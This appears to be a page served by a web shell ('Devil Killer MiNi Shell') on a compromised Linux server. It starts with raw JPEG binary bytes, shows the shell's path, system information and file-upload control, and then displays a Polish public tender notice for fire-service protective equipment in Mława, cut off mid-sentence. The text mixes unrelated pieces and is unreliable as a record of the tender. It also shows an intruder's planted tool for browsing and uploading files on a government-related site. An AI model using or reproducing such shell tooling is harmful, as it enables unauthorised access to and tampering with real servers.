JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250825/0038846501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa podstawowych środków ochrony indywidualnej, przedmiotów ekwipunku osobistego oraz rezerwy wyposażenia dla strażaków Komendy Powiatowej Państwowej Straży Pożarnej w Mławie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOMENDA POWIATOWA PAŃSTWOWEJ STRAŻY POŻARNEJ W MŁAWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130382529</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">PADLEWSKIEGO 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">23 654 35 72</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">23 654 35 72</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">technicznymlawa@mazowsze.straz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kppsp-mlawa</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa podstawowych środków ochrony indywidualnej, przedmiotów ekwipunku osobistego oraz rezerwy wyposażenia dla strażaków Komendy Powiatowej Państwowej Straży Pożarnej w Mławie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2d57942-58e4-45d5-a6e0-b07b743266db</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00388465</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00384203/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa podstawowych środków ochrony indywidualnej, przedmiotów ekwipunku osobistego, oraz rezerwy wyposażenia dla strażaków Komendy Powiatowej Państwowej Straży Pożarnej w Mławie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f2d57942-58e4-45d5-a6e0-b07b743266db <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Przed przystąpieniem doskładania oferty,Wykonawca jest zobowiązany zapoznaćsię zinstrukcją oraz regulaminem korzystania z Platformy e-Zamówienia, które zostały zamieszczone na ww. Platformie.<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu:<br/>1)	Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl<br/>2)	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:technicznymlawa@mazowsze.straz.pl(nie dotyczy składania ofert)<br/> Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu https://ezamowienia.gov.pl<br/>	Komunikacja pomiędzy Zamawiającym a Wykonawcą, a w szczególności składanie oświadczeń, wniosków,zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na platformie e-Zamówienia;<br/>	Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Maksymalny rozmiar plików przesyłanychza pośrednictwem „ Formularzy do komunikacji” wynosi 150MB (wielkość dotyczy plików przesyłanych jako załączniki do jednego (formularza). <br/>Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia(BZP).<br/>	Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r.w sprawie sposobu sporządzania przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy(Dz.U.z2020poz.2415).<br/>	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e- Zamówienia użytkownicy mogą skorzystać zewsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje ,że Administratorem danych osobowych Wykonawcy jest Komendant Powiatowy Państwowej Straży Pożarnej w Mławie , adres siedziby: ul. Padlewskiego 15 ,<br/>06 - 500 Mława tel. 23 654 35 72, <br/>e-mail: sekretariatmlawa@mazowsze.straz.pl<br/> W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych, za pośrednictwem adresu e-mail: ochronadanych@mazowsze.straz.pl <br/>	Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych.<br/>	Dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit. c RODO w celu:<br/>− udzielenia zamówienia publicznego zgodnie z przepisami ustawy prawo zamówień publicznych na dostawy<br/>− realizacji umowy o wykonanie zawartej w wyniku udzielenia zamówienia publicznego<br/>− archiwizacji.<br/> Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym, którym udostęp- niona zostanie dokumentacja postępowania w oparciu o art. 18 i art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. poz. 1320)<br/>	Dane osób uprawnionych będą przechowywane przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia publicznego lub przez czas trwania umowy, jeżeli okres na jaki umowa została zawarta przekracza 4 lata.<br/>Osobie, której dane dotyczą przysługuje prawo dostępu do danych a także, na warunkach okreś- lonych w przepisach Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r.w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, prawo sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania. Osobie, której dane dotyczą przysługuje prawo wniesienia skargi do organu nadzorczego. Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu z postępowania oraz jego załączników. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego<br/>Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PT.2370.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dostawę podstawowych środków ochrony indywidualnej, przedmiotów ekwipunku osobistego oraz rezerwy wyposażenia dla strażaków Komendy Powiatowej Państwowej Straży Pożarnej w Mławie.<br/>Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1.2 do niniejszej specyfikacji zatytułowanym - załącznik nr 1.2 Szczegółowy opis przedmiotu zamówienia. <br/>Parametry i funkcje zamawianego asortymentu nie powinny być gorsze niż wymienione w Szczegółowym Opisie Przedmiotu Zamówienia - Załącznik nr 1.2 do SWZ. (dalej OPZ)<br/>Podane w szczegółowym OPZ parametry i funkcje należy traktować jako wymagania minimalne, a zamawiane podstawowe środki ochrony indywidualnej, przedmioty ekwipunku osobistego i rezerwy wyposażenia, które są ściśle określone w Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 29 września 2021r. w sprawie umundurowania strażaków Państwowej Straży Pożarnej (Dz.U. z 2021r.poz.1795) oraz w Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 17 listopada 2023r. zmieniającym rozporządzenie w sprawie umundurowania strażaków Państwowej Straży Pożarnej (Dz.U.z 2023r. poz.2530) powinny być zgodne z tymi Rozporządzeniami, oraz dokumentacją techniczno – technologiczną ubrań znajdującą się na stronie Komendy Głównej Państwowej Straży Pożarnej w Warszawie, w zakładce ---- co robimy------- Gospodarka mundurowa. <br/>Zamawiający wymaga aby Wykonawca zapoznał się szczegółowo z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 29 września 2021r. w sprawie umundurowania strażaków Państwowej Straży Pożarnej (Dz.U. z 2021r.poz.1795) oraz z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 17 listopada 2023r. zmieniającym rozporządzenie w sprawie umundurowania strażaków Państwowej Straży Pożarnej (Dz.U.z 2023r. poz.2530)<br/>Zamawiający zastrzega sobie prawo do nieodebrania przedmiotów zamówienia niezgodnych z Rozporządzeniami o których mowa powyżej. <br/>Zamawiający wymaga, aby oferowany przedmiot zamówienia określony w załączniku nr 1.2 do SWZ był fabrycznie nowy, nieużywany wcześniej przez inny podmiot i wyprodukowany nie wcześniej niż 2025r. <br/>Wykonawca wykona przedmiot zamówienia przy użyciu własnych narzędzi (m.in. pracowników transportu). Koszty transportu, wniesienia, opakowania, ubezpieczenia na czas przewozu, ponosi Wykonawca. <br/>Wykonawca wykona przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy, obowiązującymi przepisami oraz normami.<br/>Zamawiający nie przewiduje udzielania zaliczek. <br/>Zapłata za wykonanie przedmiotu zamówienia nastąpi zgodnie z postanowieniami umowy, zawartymi w Załączniku nr IV do SWZ, po wykonaniu umowy i podpisaniu przez Zamawiającego bez zastrzeżeń protokołu odbioru.<br/>Każdy element dostarczonego asortymentu będzie podlegał odbiorowi pod względem zgodności z szczegółowym OPZ oraz obowiązującymi Rozporządzeniami. <br/>Przy odbiorze wykonanego zamówienia musi uczestniczyć osoba ze strony Wykonawcy oraz przedstawiciel Zamawiającego. Na tę okoliczność Wykonawca sporządzi protokół odbioru podpisany przez przedstawicieli Wykonawcy i Zamawiającego. Zamawiający może odmówić odbioru przedmiotu zamówienia niezgodnego co do ilości, rodzaju i jakości , z zobowiązaniem zawartym w ofercie Wykonawcy i umowie.<br/>Przed przystąpieniem do realizacji przedmiotowego zamówienia, Wykonawca uzgodni z Zamawiającym termin dostawy asortymentu objętego przedmiotem niniejszego zamówienia. Wykonawca przed realizacją zamówienia uzgodni z Zamawiającym szczegóły rozmiaru i kolorystyki oferowanego asortymentu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18400000-3 - Odzież specjalna i dodatki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35113400-3 - Odzież ochronna i zabezpieczająca</p> <p class="mb-0">18143000-3 - Akcesoria ochronne</p> <p class="mb-0">18100000-0 - Odzież branżowa, specjalna odzież robocza i dodatki</p> <p class="mb-0">35121300-1 - Osprzęt bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do przedmiotu zamówienia Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący dostawę analogicznego asortymentu, jak opisane w opisie przedmiotu zamówienia lub ograniczyć ilość zamawianego asortymentu (dalej: „Opcja”).<br/>Przedmiotem Opcji mogą być wszystkie lub niektóre asortymenty opisane w opisie przedmiotu zamówienia.<br/>Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie. <br/>Dostawy będące przedmiotem Opcji mogą zostać zlecone lub ograniczone do 20% wartości przedmiotu zamówienia określonej w projektowanych postanowieniach umowy, stanowiącego załącznik nr IV do SWZ<br/>Zamawiający zapłaci Wykonawcy wynagrodzenie wyłącznie za faktycznie wykonane dostawy w okresie obowiązywania umowy, a Wykonawcy nie służy roszczenie o realizację umowy i zapłaty wynagrodzenia w części niewykonanej w wyniku ograniczenia w ramach prawa opcji.<br/> Opis przedmiotu zamówienia znajduje się w załączniku nr 1.2 do SWZ <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować kryteria i ich znaczenie punktowe w sposób określony w pkt. 20 IDW - SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez zamawiającego warunki udziału w postępowaniu.<br/>	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie określa wymagań w tym zakresie.<br/>	sytuacji ekonomicznej lub finansowej:<br/><br/> Zamawiający nie określa wymagań w tym zakresie.<br/><br/>	zdolności technicznej lub zawodowej:<br/> Doświadczenie wykonawcy<br/>Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie ) wykonał w ramach jednego kontraktu minimum jedną dostawę umundurowania albo środków ochrony indywidualnej albo przedmiotów ekwipunku osobistego dla jednostek Państwowej Straży Pożarnej, lub innych służb mundurowych, o wartości co najmniej 100 000 zł brutto.<br/><br/>Za spełniającą warunek Zamawiający uzna zarówno dostawę (umowę) obejmującą jednorazową dostawę umundurowania/środków ochrony indywidualnej/przedmiotów ekwipunku osobistego, jak również dostawę (umowę) obejmującą sukcesywną dostawę umundurowania/środków ochrony indywidualnej/przedmiotów ekwipunku osobistego. W przypadku dostaw (umów) będących w trakcie realizacji, łączna wartość zrealizowanej/ych części dostawy (umowy) musi wynosić co najmniej 100 000,00 zł brutto. Potwierdzeniem spełniania warunku będą przedstawione referencje. <br/><br/>Uwaga: Jeżeli wykonawca w ramach wykazanej umowy realizował dostawę umundurowania/środków ochrony indywidualnej/przedmiotów ekwipunku osobistego należy pamiętać aby w podmiotowych środkach dowodowych znalazła się informacja o wartości tej dostawy tak aby Zamawiający mógł jednoznacznie stwierdzić, że Wykonawca spełnia postawiony wyżej warunek. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianie warunku Wykonawcy wykazują łącznie.<br/>Łącznie należy interpretować w ten sposób, że jeśli jeden z wykonawców może wykazać się wymaganym doświadczeniem to zwalnia pozostałych z tego obowiązku.<br/>Określone przez Zamawiającego warunki udziału w postępowaniu oraz wymagane środki dowodowe mają na celu ocenę zdolności wykonawcy do należytego wykonania niniejszego zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca składa wraz z ofertą :<br/>oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp dotyczące braku podstaw do wykluczenia składane wraz z ofertą formularz 3.1 <br/><br/>Wykonawca składa na wezwanie Zamawiającego:<br/>oświadczenie Wykonawcy/podmiotu na którego zasoby powołuje się Wykonawca o aktualności informacji zawartych w oświadczeniu złożonym na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019r. Prawo zamówień publicznych w zakresie podstaw wykluczenia z postępowania (Formularz 6.2)<br/>Oświadczenie o przynależności lub braku przynależności do grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt.5 ustawy Pzp. (Formularz 6.3) jeśli oferty złoży co najmniej dwóch Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca składa wraz z ofertą :<br/>oświadczenie na podstawie art. 125 ust.1 ustawy Pzp stanowiące potwierdzenie spełnienia warunków udziału w postępowaniu (Formularz 3.2)<br/><br/>Wykonawca składa na wezwanie Zamawiającego:<br/>Wykazu/wykazów dostaw wykonanych przez Wykonawcę (zgodnie z wzorem Formularza nr 6.1) wraz z referencjami od poprzednich zamawiających. <br/><br/>Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, 